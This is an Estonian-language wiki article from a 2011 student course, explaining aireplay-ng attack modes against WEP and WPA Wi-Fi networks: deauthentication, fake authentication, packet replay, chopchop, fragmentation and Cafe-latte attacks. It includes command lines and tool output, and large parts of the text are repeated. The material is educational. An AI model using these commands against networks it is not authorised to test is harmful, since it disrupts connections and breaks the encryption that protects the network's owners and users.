Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:34:36Z

Tliiv: /* Suunatud */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0 -c CC:CC:CC:CC:CC:CC --ignore-negative-one
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 0|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

